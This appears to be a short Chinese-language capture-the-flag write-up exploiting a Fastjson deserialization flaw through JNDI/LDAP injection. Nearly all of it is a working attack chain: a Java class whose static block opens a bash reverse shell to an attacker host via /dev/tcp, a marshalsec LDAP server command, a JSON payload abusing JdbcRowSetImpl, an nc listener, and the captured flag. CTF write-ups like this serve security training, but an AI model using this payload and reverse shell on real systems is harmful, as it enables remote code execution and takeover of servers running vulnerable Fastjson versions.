将Shell.java编译后放在vps上
import java.lang.Runtime;
import java.lang.Process;
public class Shell {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"/bin/bash", "-c", "bash -i >& /dev/tcp/kail-ip/8888 0>&1"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
}
}
}
vps执行下列命令
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://VPS-IP/#Shell PORT
使用burp发送,注意发送数据格式:Content-Type: application/json
POC:
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://VPS-IP:PORT/Shell",
"autoCommit":true
}
}
kali上开启监听,接收反弹shell
nc -lvnp 8888
得到flag
flag-{bmh212b89ac-cbf2-41bd-be40-d32b757df8f6}